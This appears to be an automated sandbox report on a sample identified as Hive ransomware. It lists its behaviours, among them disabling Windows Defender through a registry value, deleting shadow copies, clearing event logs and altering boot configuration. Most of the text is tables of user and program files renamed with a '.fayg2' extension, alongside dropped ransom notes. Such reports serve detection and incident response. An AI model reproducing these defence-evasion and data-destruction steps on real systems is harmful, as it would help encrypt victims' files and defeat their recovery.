Analysis Overview
SHA256
2d1272eb42b05f4f960c48969edfeb8ae7674e817e06596f7f6567dc2f2ae80a
Threat Level: Known bad
The file 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.7z was found to be: Known bad.
Malicious Activity Summary
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
Deletes Windows Defender Definitions
Deletes shadow copies
Clears Windows event logs
Modifies boot configuration data using bcdedit
Modifies extensions of user files
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Interacts with shadow copies
Opens file in notepad (likely ransom note)
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Runs ping.exe
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-12 16:59
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-12 16:59
Reported
2022-01-12 16:59
Platform
win7-en-20211208
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-12 16:59
Reported
2022-01-12 17:04
Platform
win10-en-20211208
Max time kernel
130s
Max time network
127s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\ConvertUndo.raw => C:\Users\Admin\Pictures\ConvertUndo.raw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_E09cKgYNav00.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ExitDisable.tiff.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_qNlJd3YsouQ0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\GetConvert.raw => C:\Users\Admin\Pictures\GetConvert.raw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_fYUllUM0caM0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\GetConvert.raw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_fYUllUM0caM0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UnblockRead.crw => C:\Users\Admin\Pictures\UnblockRead.crw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_Xnx3lhmhmPE0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ClearUnblock.tif.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_FqTs8GjBaJk0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ConvertFromWatch.tif.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_cJn0DEq6Rgg0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ExitDisable.tiff => C:\Users\Admin\Pictures\ExitDisable.tiff.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_qNlJd3YsouQ0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RevokeShow.crw => C:\Users\Admin\Pictures\RevokeShow.crw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_O0kq1w2cnno0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\RevokeShow.crw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_O0kq1w2cnno0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UnblockRead.crw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_Xnx3lhmhmPE0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UnregisterUninstall.raw => C:\Users\Admin\Pictures\UnregisterUninstall.raw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_o4__AM0vRh00.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UnregisterUninstall.raw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_o4__AM0vRh00.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ClearUnblock.tif => C:\Users\Admin\Pictures\ClearUnblock.tif.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_FqTs8GjBaJk0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ConvertFromWatch.tif => C:\Users\Admin\Pictures\ConvertFromWatch.tif.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_cJn0DEq6Rgg0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ConvertUndo.raw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_E09cKgYNav00.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarMediumTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\MyEY_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-actions.xml.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_YjkjK1zNz6k0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_g3YGpliQpV80.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\snooze.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailMediumTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_xIes2C3GJjM0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\ja-JP\mpvis.dll.mui | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-cn\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_56X9YDnq9T80.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\da-dk\MyEY_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\FileIcons\FileLogoExtensions.targetsize-64.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-96_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\cs_get.svg.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_YWM-xxoZpJo0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-si\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_N48kz_S-KhI0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\uk-ua\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_CLyQYkX5yas0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\1851_32x32x32.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\dog.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\yes.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PAPYRUS\THMBNAIL.PNG.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_HcI12rm-7Fo0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsBadge.scale-100.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\tl.gif.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_Ij5-2TZ_N-40.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_Kknn9XxJp980.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\hr.txt.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_KzNTLt6yQ0k0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\Informix.xsl.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_tjg-o2N9eH80.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelGlyph.16.GrayF.png.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_ctjZqlq9_4I0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECLIPSE\THMBNAIL.PNG.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_n1kC6pWPWS40.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\tr-tr\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_qJ0ZSxE6MLI0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-80.png.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_hr28k-k8PzA0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluDCFilesEmpty_180x180.svg.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_-7vNXyV189g0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_GB\List.txt.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_epsLSXRoy1s0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ru-ru\MyEY_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pl-pl\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_J8MMLlYYKFg0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\root\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_MciW4qZaIZQ0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\4.jpg | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x86__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\Icons\icon_done.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarWideTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\1937_24x24x32.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\OutlookMailMediumTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\fillandsign.svg.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_ubujE1IbqKY0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\POWERPNT_F_COL.HXK.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_vhYEu46qc280.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-96_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Fues\Popup_shadow_1.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-black_targetsize-96_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_Retail-pl.xrm-ms.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_SfuHP0aEGT80.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_l-Yk8OlUc5M0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageBadgeLogo.scale-200_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\de-DE\msadcor.dll.mui.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_m1YXZJFjCUA0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\MyEY_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Buttons\Undo\Undo-up.mobile.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\OutlookMailSmallTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Yahoo-Light.scale-300.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-hover_32.svg.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_rMDPNrJpn3k0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Green.xml.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_KSLlgM8ub4k0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\starttile.wink.scale-200.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-60_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\logo_retina.png.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_IUEyHQ8A1zk0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubWideTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\EmbossBitmaps\Sun.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
